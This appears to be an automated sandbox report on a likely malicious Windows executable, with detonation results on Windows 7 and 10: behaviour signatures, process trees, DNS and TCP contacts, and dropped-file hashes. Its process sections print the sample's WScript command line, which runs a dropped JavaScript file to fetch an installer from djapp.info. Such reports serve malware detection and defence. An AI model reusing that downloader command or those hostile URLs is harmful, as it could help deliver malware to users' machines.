Analysis Overview
SHA256
251a196a6611a19878246b0ada11c4db277bcd25b58c2a8de6ae9fae113a8a89
Threat Level: Likely malicious
The file 91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
Modifies registry class
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 13:02
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 13:02
Reported
2024-06-03 13:05
Platform
win7-20240221-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 608
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
| MD5 | 64369fef1b8498606c9f058a069e4a67 |
| SHA1 | e9ca6cb18521f68d60580fe06a976eae9a0080b0 |
| SHA256 | 1a9aaf80be461cf461926858d55687c37e64bfdca189548c91131753ae2e5e7f |
| SHA512 | 07c996106388cc7f4e74c2c1663bc81483ae39c93e70d8c15308c1f8d11b3ef24c4db6875f57ee2f2e9d5bcd7a8a2d76e5ccdf29f650a32cae57fe19393d50f2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8W3PDETZ.txt
| MD5 | 4f49c38907c96547eda06f4a5f190d18 |
| SHA1 | 4d1dac05c21c8d45996c03db5b6d8f55c4f48808 |
| SHA256 | 8b9db1405fb037a8f0483a2dd1820bbae29b19b1983a6f7a6ec1edb2c77c05bf |
| SHA512 | 5a71446f3cbb63b897d870c284b84e06451685f093e6a9f2f417230112cc138503ccc23903a97dda92c6b1fd41a7fe94d0402c2dde5ce86a3f2df7122102ca37 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3320dd63463e0108fcaecd3c50e4eb79 |
| SHA1 | d7af1d0cbfa2f7069aeac5ad8f3b5f676e13e549 |
| SHA256 | 168d3092885b2803133ea85025b66801f463af6422d96a85e8604e7615865f2c |
| SHA512 | 052c6f724b7b7c6d2b5c2398660180a3f29bd74328cd35fa23ae3579e39b242e1b067dc8e9f750f6c1f39311e5a08e8146d683470362e52a2032f7c488da5fac |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 72abe4a1b6512c443a8a481040130afc |
| SHA1 | 0c630b47c5211479e37c93a8b7241515a3b9a8d3 |
| SHA256 | 54245279f6544cf94887b48d0fb009f167e45d05aef11676ef9140178968efe9 |
| SHA512 | 79aaf19c2fe6e735b039f3b2d9200188c01837f095560867f30f88f56d5a21493761f486ba913072e6ffb5b0acdac64422e9e50501ddbfe140471c27d719659d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 13ed5e0369cedc64c8437eb9a493a981 |
| SHA1 | 880053c91809fef7b2a3d688143f554d5a05c0bd |
| SHA256 | 3560614f2f62c19498d2ad6c3b9fa8f232883167479de05e924a5a3ab19a8454 |
| SHA512 | 18b3c940a3b722b58c476af4141ab987ed9f7557c1e52f3f20548b2c209abd67c943761d22e20ed59c36d69f8cd911285aff7efdf2d20f51c35cad62932aefa0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 9887eec51ccd9f25b0bff10391619e34 |
| SHA1 | 5f490df9c45edfca8e4767e24296e01ce1bc46a5 |
| SHA256 | b8759be34284f72075dddea1c8d97567ba32040c9332596565564503267a90be |
| SHA512 | 88d952f5daf944a78da5aa9efe46bde7bdb13fd8075938ee040b6c69b31ee8e85bfe7c10934efc77350dac88eca3e722e66fc662d63d45ab1bff2e76df3f3a93 |
C:\Users\Admin\AppData\Local\Temp\Cab9C6E.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
| MD5 | 3c6b0f404033916623eddaa124ce3909 |
| SHA1 | 59dfe27e5fed31c3fed5ab8f19cda4d3bae94e42 |
| SHA256 | 7415acbade83996cb86f812aea26c63d07273b33d90127138f769e904f3463d1 |
| SHA512 | 1a4e02d4ffcbc88fe537960887e1680662269c9e37b2dfd891e42149132be96e89b894138f82897e2a7d317415a83f8007d97dcd008af24384959c5241b516b3 |
C:\Users\Admin\AppData\Local\Temp\TarB74F.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
| MD5 | 9cefdc77c5f0bc80398dbd8cf2e18a71 |
| SHA1 | 36785b45766e667782edfc51a950c79aec6afbd7 |
| SHA256 | 6f5c5a3474feba20eb15b4b23e6ee13eea5d4e4fe39f39b389eb28645cbbfbd2 |
| SHA512 | df75378c2089652df5972fe61ce757338e993b730400a393a6cc3f765326d807198899dc71009ff804aacfb3d1fe28c8c5267482cb9b23be3dfd8c33b8efea53 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
| MD5 | 19cc0f5b83da7916f54d28d9a446e58d |
| SHA1 | 0f2caf2d4fba788b8a2144f2ddfdaa5e66351125 |
| SHA256 | 9b6b248ffa6faafaf1ae752962d192a331376f746bb9d7c3193093bfb863fa71 |
| SHA512 | f0e035946552a4e684e9080bcd53cef70ba27eaddff50ed034bad9221076332299f8575d060f0ae4b5492b2349f437f8fa510428cec81628b49af68680bb5c14 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 13:02
Reported
2024-06-03 13:05
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2408 -ip 2408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 1448
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 8.8.8.8:53 | 23.253.130.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 66.154.119.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 |  | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf376B.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |